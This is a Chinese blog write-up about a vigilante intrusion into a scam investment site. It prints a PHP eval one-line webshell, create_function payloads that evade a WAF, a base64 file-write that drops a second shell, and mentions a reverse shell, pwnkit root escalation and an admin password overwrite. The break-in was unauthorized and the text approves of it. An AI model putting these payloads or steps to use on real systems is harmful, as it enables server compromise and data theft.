1. 缘由

技术可能有不太连续的地方，因为时间比较远了，文章可能不完整，将就着看吧。

技术核心还得是小绵羊师傅，膜拜！

大概在2年前的时候，根据消息，对某新开的违法资金盘进行渗透，整个过程一波三折，时间过去这么久了，在这里对整个经过进行脱敏之后和大家分享下。

在某一个诈骗群中，有一个新型的传销资金盘正在筹备中，该项目在某聊天工具群中发布消息进行洗脑：

在这里人家已经说了，就是资金盘，其中有很多人都是带着自己的所谓的下级去赚钱，实际上这些人都是托。

因为群会风控，所以骗子就会要求已经注册的会员到另外一个平台的群组里面去：

2. 渗透过程

2.1 getshell

因为违法盘是当天发的，渗透也是当天做的，通过二维码扫描，发现该站点为一个thinkphp的站点，而且爆出了版本信息：

服务器搭建在香港，并且存在cdn：

通过骗子提供的邀请链接，正常注册之后，进入普通用户后台：

进入后台之后，就展开一系列的信息搜集工作，此时对方站点存在cdn，但是不存在waf，通过一系列鼓捣之后，拿到了shell：

拿到shell之后，发现此时是www权限：

至此，getshell算是告一段路，在这里要说的是，当时由于麻痹大意，shell是php的最简单的一句话木马，没有做任何的免杀措施，当时因为很顺利，就去吃饭去了，吃完之后，再鼓捣。

2.2 优势宰我-寄

从下午18:00点发布的盘，基本上18:30拿到了shell，尝试提权失败，然后就稍微休息了一下，吃完饭回来，大概不到19:00的样子，shell连不上了，而且上了强力waf：

尝试漏洞利用的时候，发现寄：

但是原来的一句话木马还在，直接访问当时的一句话木马文件，可以访问到，但是当执行命令的时候，对方使用了宝塔，而且还有cdn，只要是访问有异常，直接封禁。

寄

只要是有一条不正确，直接大寄：

寄

2.3 峰回路转

整理下思路：

目前遇到的漏洞利用点被宝塔禁了，但是上面还有一句话木马在，能连是能连，但是执行操作就会寄，虽然存在cdn，但是通过报错，获取到了服务器的真实ip。

我滴工作基本就到这了，后面就是小绵羊师傅来操作的：

耗费了很多时间之后，求教了小绵羊师傅，通过师傅一番操作之后，通过php的一句话木马，顺利执行得到了phpinfo信息：

一句话木马：
<?php @eval($_POST[a])?>

小绵羊师傅用下面的一句话获得phpinfo：

post:
a=$url="php";$p="info();";$c=$url.$p;$s= create_function('',$c);$s();

再利用php的input协议，得到了一个新的免杀shell：

a=$url="file";$p="_put_contents('a.php',base64_decode('b24gX19pbnZva2UoJHApIHtldmFsKCRwLiIiKTt9fQogICAgQGNhbGxfdXNlcl9mdW5jKG5ldyBDKCksJHBhcmFtcyk7Cj8%2BCg%3D%3D'));";$c=$url.$p;$s= create_function('',$c);$s();

冰蝎马get：

最后通过命令执行反弹得到了一个shell：

但是这个shell好像不太聪明，限制太多，肯定就是宝塔的基操了，在这里运气不错，通过pwnkit提权成功，获取到了root权限：

然后通过宝塔的后渗透操作，到了后台：

在这里默认密码都修改了，最后是新增用户上去的：

2.4 数据部分

资金盘基操：站库分离

后台拿到了源码之后，经过分析，找到了数据库的地址，通过代码临时替换了管理员密码，登录后台成功：

3.总结

在这个里面很多地方都是省略了，其实中间蛮曲折的，骗子是非常专业的，他们的运维也是非常专业的。

他们的站点可能有几十个，专业行骗，专骗老幼和宝妈，非常可恶！